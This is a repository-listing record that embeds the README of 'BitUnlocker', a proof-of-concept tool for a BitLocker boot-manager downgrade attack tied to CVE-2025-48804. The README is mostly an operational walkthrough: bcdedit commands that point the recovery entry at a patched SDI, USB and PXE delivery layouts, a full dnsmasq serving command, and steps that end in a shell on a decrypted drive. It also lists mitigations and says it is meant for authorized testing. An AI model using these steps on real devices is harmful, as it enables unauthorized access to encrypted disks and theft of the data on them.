[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76113":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":20,"compositeScore":21,"rankGlobal":10,"rankLanguage":10,"license":22,"archived":23,"fork":23,"defaultBranch":24,"hasWiki":25,"hasPages":23,"topics":26,"createdAt":10,"pushedAt":10,"updatedAt":30,"readmeContent":31,"aiSummary":32,"trendingCount":16,"starSnapshotCount":16,"syncStatus":14,"lastSyncTime":33,"discoverSource":34},76113,"BitUnlocker","garatc\u002FBitUnlocker","garatc","Downgrade attack for CVE-2025-48804","",null,"Python",206,38,2,1,0,4,6,24,12,4.77,"MIT License",false,"main",true,[27,28,29],"bitlocker","bitunlocker","cve-2025-48804","2026-06-12 02:03:40","# BitUnlocker Downgrade Attack\n\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](LICENSE)\n\nA proof of concept for accessing BitLocker-encrypted disks **in under 5 minutes** on fully patched Windows 11 machines through a boot manager downgrade attack, leveraging the SDI vulnerability originally documented as **CVE-2025-48804**. The July 2025 patch fixes this in `bootmgfw.efi`, so any pre-patch `bootmgfw.efi` signed under PCA 2011 can be used for a downgrade attack, provided the target system trusts this PCA.\n\nThis PoC provides two delivery methods: **USB boot** (simpler and recommended) and **PXE boot**. 
Other approaches relying only on local partitions would probably be possible as well with a smaller SDI file.\n\nThis work builds entirely on the research by **Microsoft STORM** (Netanel Ben Simon and Alon Leviev):\n> [BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets](https:\u002F\u002Ftechcommunity.microsoft.com\u002Fblog\u002Fmicrosoft-security-blog\u002Fbitunlocker-leveraging-windows-recovery-to-extract-bitlocker-secrets\u002F4442806)\n\n---\n\n## Prerequisites\n\n- Physical access to a BitLocker-encrypted device (TPM-only, PCR 7 + 11)\n- The device's Secure Boot database still trusts the **Microsoft Windows PCA 2011** certificate\n- A USB stick (recommended) **or** a Linux machine with `dnsmasq` and an Ethernet cable for PXE\n\n## Step-by-step\n\n### 1. Download boot_patched.sdi from Releases (or build your own SDI file, see below)\n\nPut it in `USB\u002Fsdi\u002F` (for USB method) or `TFTP-root\u002Fsdi\u002F` (for PXE method).\n\n### 2. Prepare the modified BCD\n\nOn the target device, open a WinRE command prompt (hold **Shift** while clicking **Restart**, then **Troubleshoot > Command Prompt** — click \"Ignore this disk\" when prompted for a BitLocker recovery key and click \"relaunch\" if you're also told that the cmd prompt cannot run on a locked device — and if the cmd prompt just won't open, use your own WinPE if you can). Plug in a USB stick and run:\n\n```bat\nE: (or wherever your USB is)\nbcdedit \u002Fexport BCD_modded\nbcdedit \u002Fstore BCD_modded \u002Fset {default} path \\WINDOWS\\system32\\winload_DOESNOTEXIST.efi\nbcdedit \u002Fstore BCD_modded \u002Fenum all\n```\n\nIn the output, find the entry whose description is **\"Windows Recovery\"** and which contains `ramdisksdidevice` \u002F `ramdisksdipath` entries. 
Note its GUID, then:\n\n```bat\nbcdedit \u002Fstore BCD_modded \u002Fset {GUID} ramdisksdidevice boot\nbcdedit \u002Fstore BCD_modded \u002Fset {GUID} ramdisksdipath \\sdi\\boot_patched.sdi\nmove BCD_modded BCD\n```\n\nPlace the resulting `BCD` file in the appropriate location depending on your method:\n- **USB:** `USB\u002FEFI\u002FMicrosoft\u002FBoot\u002FBCD`\n- **PXE:** `TFTP-root\u002FBoot\u002FBCD`\n\n### 3. Boot the target\n\n#### Option A: USB boot (recommended)\n\nFormat a USB stick as **FAT32** and copy the contents of the `USB\u002F` directory to its root. The USB stick should look like this:\n\n```\nUSB stick root\u002F\n├── EFI\u002F\n│   ├── Boot\u002F\n│   │   └── bootx64.efi        # Pre-patch boot manager (PCA 2011)\n│   └── Microsoft\u002F\n│       └── Boot\u002F\n│           └── BCD             # Your modified BCD\n└── sdi\u002F\n    └── boot_patched.sdi        # Patched SDI with custom WinRE\n```\n\nPlug the USB stick into the target and trigger a UEFI USB boot — either from WinRE (**Use a device**) or by pressing the manufacturer's boot menu key at power-on (F12, F9, etc.). 
If the USB stick doesn't appear in the list of boot options, look for a **\"Boot from file\"** option in the UEFI boot menu, then navigate to `EFI\u002FBoot\u002Fbootx64.efi` on the USB stick.\n\n#### Option B: PXE boot\n\nThe `TFTP-root\u002F` directory is structured as follows:\n\n```\nTFTP-root\u002F\n├── bootmgfw.efi                # Pre-patch boot manager (PCA 2011)\n├── Boot\u002F\n│   └── BCD                     # Your modified BCD\n├── EFI\u002F\n│   └── Microsoft\u002F\n│       └── Boot\u002F\n│           └── bootmgfw.efi    # Same pre-patch boot manager\n└── sdi\u002F\n    └── boot_patched.sdi        # Patched SDI with custom WinRE\n```\n\nConnect the target to your Linux machine via Ethernet and start the PXE server:\n\n```bash\ncd BitUnlocker\nexport INTERFACE=\u003Cyour-interface>\nexport ABS_TFTP_ROOT=$(pwd)\u002FTFTP-root\n\nsudo ifconfig $INTERFACE 10.13.37.1\nsudo dnsmasq --no-daemon \\\n  --interface=\"$INTERFACE\" \\\n  --dhcp-range=10.13.37.100,10.13.37.101,255.255.255.0,1h \\\n  --dhcp-boot=bootmgfw.efi \\\n  --enable-tftp \\\n  --tftp-root=\"$ABS_TFTP_ROOT\" \\\n  --log-dhcp \\\n  --tftp-max=65464 \\\n  --port=0\n```\n\nTrigger PXE boot on the target — from WinRE select **Use a device > IPv4 Network**, or press the manufacturer's PXE boot key.\n\n### 4. Wait for the SDI transfer\n\nThe boot manager will load the BCD, then start downloading `boot_patched.sdi`. The SDI file is large (~300 MB) so this takes a moment from USB, or **several minutes** over TFTP. A recovery-related message with the SDI path should appear on the target screen while it loads.\n\n### 5. Profit\n\nOnce the transfer completes, a command prompt should appear with the OS volume decrypted and mounted (typically `C:` or `E:`). 
If it wasn't mounted automatically or you don't want to guess the letter, just run `diskpart` -> `sel vol X` (the one that looks like your encrypted drive) -> `assign letter=C` (or something else) -> `exit` -> profit\n\n### Edge cases\n\n| Situation | What happens |\n|---|---|\n| BitLocker configured with a **PIN** you know | Blue screen at boot — type the PIN blindly and press Enter |\n| Blue screen, no PIN | Target has likely migrated to CA 2023 — press Escape and let the SDI transfer finish anyway, but the BitLocker-encrypted drive will most likely be locked at the end |\n| USB-C \u002F Thunderbolt only | Use a USB-C drive or USB-Ethernet adapter (for PXE) |\n| TFTP file not found (other than garbage Font files which we don't care about) | File names are case-sensitive — rename `bootmgfw.efi` to match what the target requests |\n\n---\n\n## Build your own SDI file\n\nI've included two scripts in `scripts\u002F`:\n- `patch_sdi.py` — builds a modified SDI file from a `boot.sdi` and a `WinRE.wim` file\n- `parse_sdi.py` — parses an SDI file to validate its structure and content\n\nThe `boot_patched.sdi` file provided in Releases contains a modified WinRE.wim where the launch app is `cmd.exe`.\n\n## Unexploitable cases\n\n- **TPM + PIN or TPM + key file** is configured and the attacker doesn't know it\n- **KB5025885 is installed \u002F the boot manager has been migrated to CA 2023** — machines freshly installed since early 2026 likely ship with a CA 2023-signed `bootmgfw.efi` by default. To check, mount the EFI partition and inspect the active binary: `mountvol S: \u002Fs` then `sigcheck -i S:\\EFI\\Microsoft\\Boot\\bootmgfw.efi`. 
Note that `C:\\Windows\\Boot\\EFI\\bootmgfw.efi` may differ from the file actually used at boot — always check the EFI partition copy.\n- **Non-default PCR policy** — configurations involving PCR 0, 2, or 4 will detect the change in boot path\n- **PCA 2011 revoked via DBX** — if the old certificate has been explicitly distrusted\n\n---\n\n## Mitigations\n\n- **Enable TPM + PIN** — a pre-boot PIN prevents the TPM from unsealing the VMK without user interaction, regardless of boot path manipulation. Keep in mind however that it wouldn't stop an insider who has knowledge of the PIN.\n- **Migrate to Windows UEFI CA 2023 and apply [KB5025885](https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Ftopic\u002Fkb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d) to prevent downgrade attacks altogether**\n\n---\n\n## Credits\n\n**Microsoft STORM (Netanel Ben Simon and Alon Leviev)** for the original BitUnlocker research and vulnerability disclosure.\n\n---\n\n## License\n\nThis project is licensed under the [MIT License](LICENSE). See the [LICENSE](LICENSE) file for details.\n\n## Disclaimer\n\nThis repository and all its contents are provided strictly for **authorized security testing and research purposes**. Only use this tool on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse or damage resulting from the use of this material.\n","BitUnlocker is a downgrade attack tool targeting the CVE-2025-48804 vulnerability, used to quickly access BitLocker-encrypted disks on fully patched Windows 11 machines. The project exploits the SDI vulnerability by replacing the `bootmgfw.efi` file and supports two delivery methods, USB boot and PXE boot. Its core capability is unlocking BitLocker encryption in under five minutes, applicable in scenarios that require physical access and where the target system trusts the Microsoft Windows PCA 2011 certificate. The project is written in Python, provides detailed step-by-step instructions, and builds on the research of the Microsoft STORM team.","2026-06-11 03:54:32","CREATED_QUERY"]